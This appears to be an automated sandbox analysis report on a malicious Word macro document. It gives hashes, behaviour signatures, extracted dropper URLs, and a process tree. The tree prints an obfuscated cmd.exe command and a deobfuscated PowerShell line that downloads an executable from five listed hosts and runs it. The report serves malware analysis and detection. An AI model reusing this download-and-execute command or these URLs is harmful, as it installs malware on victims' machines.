Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-05-2024 17:03

General

  • Target

    60374b6b6af3002c0ece1e99d1da0be3_JaffaCakes118.doc

  • Size

    196KB

  • MD5

    60374b6b6af3002c0ece1e99d1da0be3

  • SHA1

    084ced349bd9a2134d054dc2d0945109c245044f

  • SHA256

    d89561784bc9cc81bce5a9918801420e466282f164f0a1d891c3ff27226072c6

  • SHA512

    f342643753bdecb25be0c3bfbd46b5440712051ea6c7d9c66ecb1d66f8f3fdd7f7ffd0c8d69354f3dd27181454b3badd9f47e9495b3226eafad9e602787a5de2

  • SSDEEP

    3072:9te2dw99f20PE5iPieV83OqWwRqgLQ+v82YVWuO0SjM5/9hpfixCnQOvJ0zjH7UU:fHdw7t8wieWRqQzxfXUJahNBZhH

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://bnote.novelux.com/qvE6Rp

exe.dropper

http://atmah.org/Em1cXp

exe.dropper

http://tinhhoabattrang.vn/nb

exe.dropper

http://1001tur-tver.ru/wc1Xm

exe.dropper

http://350degrees.org/xUvee47E

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\60374b6b6af3002c0ece1e99d1da0be3_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4040
    • C:\Windows\SYSTEM32\CMd.exe
      CMd /V:/C"^se^t -^@^$=-_\^ _/- ^\-_ /-\ /^-^_ \^-^_^ /\^_^ _/^\^ ^_/^\^ /-^\ /^-^_ /-^_^ -_^\ ^_/^\ ^\/^_ -\^_^ /^-_ ^-\^_}^-^\/}\/^-^{/_\^h\/^-c-_\^t^_-/a/^\_c/^_\^}/_-;-/^_^k\^_^-^a-\/^e/\-r^-_^\b^_/\;^-^_\j/^-^\^j\^_-^a/^_-$^_-\^ ^_^-^\^m\_/^e/_\^t^\/-I-\_-_^-\e^_^\/^k^\_^-^o/_^\v/\^-n-/\^I/_-^;\/^-)^_-/^j^_\/^j-/^_^a^-/\^$/_^\ /\_^,_\/^T^_/-N_/^\V^-\_$_/\(-/_^e_^-/l/\^_^i/^\^_^F^_\-^d_^\/a\/^-o/_^\l_/-n^-^\/w^-_^\^o^_-/D/\^-^._/^\T^\/^_o^\/^-S\-/$^-^_^\^{_/-y^-/^_r_\/^t^-_/{/_\)/-_^i\-/^z/^\^-b/^-\^$-^_/ \^_/n-/_^i/^\-^ /\-T^_^\/N^-_/V_/-$^\/-(^-_/h^\/^-c\/_^a\^_/e/\^-r^\_^-o^_/-^f-^_\;-^\_'^\/-e^\_/x^-^_\^e^-/_^./-^_'/^\^-+/^\-p/_-q-\/j-_^\$\_/^+/\-^'/^\^_\^_\/^'/^-^_^+^-^\^_c/_^-i/_^\l-/^_^b-\/u^\_^-^p^-^\^_^:-^\/v^_/\n^-/^_e/\-^$/_\^=/_-j^_\-j/-^_a_^\^-^$-_/;^-/\^'_^\/7/-^_^7^-\^_1_^\/'^_\/ /\_^=/^-_^ _/^\^p/\^_^q/^\^_^j^\^-^_$\/^_^;/-\)\/^-^'\^_-^@^\_/'-^_\(/^-^_^t^\_^-^i_^-^\l^_/-p^-^_\S/\^_.^-^\_'\-_^E\-/^7_/^-^4-_\e-/^_^e/^_-v/^-_U^_^-^\x\^-^_//\^-^g/^_^\r\/^-o_-/.\/^-^s^_^-^\e^\/_e^\/_r\/-^g\/^_^e/^-^\d/_^\^0-^\_^5-_^\^3^-/^_//-^_//^\-^:-/^\p^-/^\^t-/^_^t\/^-^h\-/^@^-\_m\^_-X-^\_^1/_\c-\_w^\^-_/\_^-^u\/^_r\^-_^.^-/\r^_/^-e-/\v-/\^t^\/^-^--\^_r-/_u^-/^_^t-^_/^1^_^\^-0^-/\0/\^_^1_/\//^_\/^\/^-^:/^-^\^p/_^-^t/^_\^t-_/h^\^_^-^@\^_/^b_^-^\n_\///^\^-n^_/^\v_^-/.^_^-\g/_^\n^\/^_^a_/^\r^_/^-^t\_^-^t-\/^a_/-^b_^-/^a^_-/^o^_^-\h^\/^-^h-^_/n/^_^-^i/^-\^t/_\//\^-/^-^_/^:/_^-^p-/^_^t_^\^-^t^\-/^h^_^\/^@^_^\^-^p-^_\X\^_^-c_^\/1\/-m^_-\E_/^\//_\g/^-^_r^-\/o^_^-/^.\^-^_^h^-/^_^a\/^_^m^\-_^t^-^_/^a\^_//^-^_\/^\^-_:-^_^\p^_^-/t/\^_t^-_^\h/^\-^@/-\p\-_R-_^\^6^\^-/E^\/^_v^_^\-^q-/_/^_/^-^m-_^\o-/^\c^_/^\./-^_x\/^_^u^-\/l^-^\^_^e_/-v^-_\^o^\/^_n/\_.^\^-^_e^-/\t/^\_^o/^-^\n_/\b-^\^_/\/-/^_^-/^:^-\/^p/\^-^t^\-/t^_^-\^h^\^_-^'/^_^\=-/_i^-^\_^z/_^\^b^-/\^$-/^_;-/^_^t^_\/n^-_/e^\/^_^i^\^_^-l/^_\C^_\^-^b_-/^e\/_^W^-^\/.^\-/t-/^_e^_^-/N^\/^_ -/\t-/_c^\_/^e/\-j-\^_^b^-\_^o-\_--\/w/^-_^e^_/^-n^_\^-=^_^-/^T^_/^-^o^_/^-^S\/_$\_^-^ ^\/^_l_^\-^l^\-/e^\^_^-^h\/^_^s\-^_r/^-\^e-/_w\-_o-/^_^p&&^f^or /L %n ^in (^14^1^9^,^-^4^,^3)^d^o ^s^et ^},^#=!^},^#!!-^@^$:~%n,1!&&^i^f %n ^eq^u ^3 c^al^l %^},^#:~-^35^5%"
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:4212
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $SoT=new-object Net.WebClient;$bzi='http://bnote.novelux.com/qvE6Rp@http://atmah.org/Em1cXp@http://tinhhoabattrang.vn/nb@http://1001tur-tver.ru/wc1Xm@http://350degrees.org/xUvee47E'.Split('@');$jqp = '177';$ajj=$env:public+'\'+$jqp+'.exe';foreach($VNT in $bzi){try{$SoT.DownloadFile($VNT, $ajj);Invoke-Item $ajj;break;}catch{}}
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1904

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCDA035.tmp\iso690.xsl

    Filesize

    263KB

    MD5

    ff0e07eff1333cdf9fc2523d323dd654

    SHA1

    77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

    SHA256

    3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

    SHA512

    b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rhief4ap.egd.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Public\177.exe

    Filesize

    1KB

    MD5

    a5e197167c4d08ba5baa39d08cddf59d

    SHA1

    54ddc4027f9403eeacdac4f9b71fc242036abe02

    SHA256

    f81f7e140ffc288957822d9911b978dea75ed051f7ee2a3804f04d825039363d

    SHA512

    df171f712895d940d9dc4599b877e5b22b05e8264ccea5ad9f8b614a432a2a002157a4bb667b5e29adfea0a3ed3a8af4adf51524bc3c17ce7df52c8748d4fe64

  • C:\Users\Public\177.exe

    Filesize

    1KB

    MD5

    76eba9e22b19a073a3c2b721cd0874e2

    SHA1

    f85e1822d4dbdb2f8b22ca08cb97438c66fd8a31

    SHA256

    de321060187c84623d6519cceff5983454c208de4af8579c64fc2dfde7736154

    SHA512

    e7012010413ce0a5302eb418745e5964ba87e2ae52d30aa8499ca2e3086496ee215f21362ae7b995907c577b13d2472d5510b2c943bdb560ebfa2233a9ad3abf

  • memory/1904-49-0x0000029CDD1B0000-0x0000029CDD1D2000-memory.dmp

    Filesize

    136KB

  • memory/4040-8-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-43-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-7-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-9-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-2-0x00007FFCD82B0000-0x00007FFCD82C0000-memory.dmp

    Filesize

    64KB

  • memory/4040-10-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-11-0x00007FFCD5950000-0x00007FFCD5960000-memory.dmp

    Filesize

    64KB

  • memory/4040-13-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-12-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-14-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-15-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-16-0x00007FFCD5950000-0x00007FFCD5960000-memory.dmp

    Filesize

    64KB

  • memory/4040-18-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-17-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-36-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-39-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-42-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-6-0x00007FFCD82B0000-0x00007FFCD82C0000-memory.dmp

    Filesize

    64KB

  • memory/4040-41-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-5-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-4-0x00007FFD182CD000-0x00007FFD182CE000-memory.dmp

    Filesize

    4KB

  • memory/4040-3-0x00007FFCD82B0000-0x00007FFCD82C0000-memory.dmp

    Filesize

    64KB

  • memory/4040-0-0x00007FFCD82B0000-0x00007FFCD82C0000-memory.dmp

    Filesize

    64KB

  • memory/4040-1-0x00007FFCD82B0000-0x00007FFCD82C0000-memory.dmp

    Filesize

    64KB

  • memory/4040-540-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-559-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-560-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-561-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB

  • memory/4040-581-0x00007FFCD82B0000-0x00007FFCD82C0000-memory.dmp

    Filesize

    64KB

  • memory/4040-582-0x00007FFCD82B0000-0x00007FFCD82C0000-memory.dmp

    Filesize

    64KB

  • memory/4040-584-0x00007FFCD82B0000-0x00007FFCD82C0000-memory.dmp

    Filesize

    64KB

  • memory/4040-583-0x00007FFCD82B0000-0x00007FFCD82C0000-memory.dmp

    Filesize

    64KB

  • memory/4040-585-0x00007FFD18230000-0x00007FFD18425000-memory.dmp

    Filesize

    2.0MB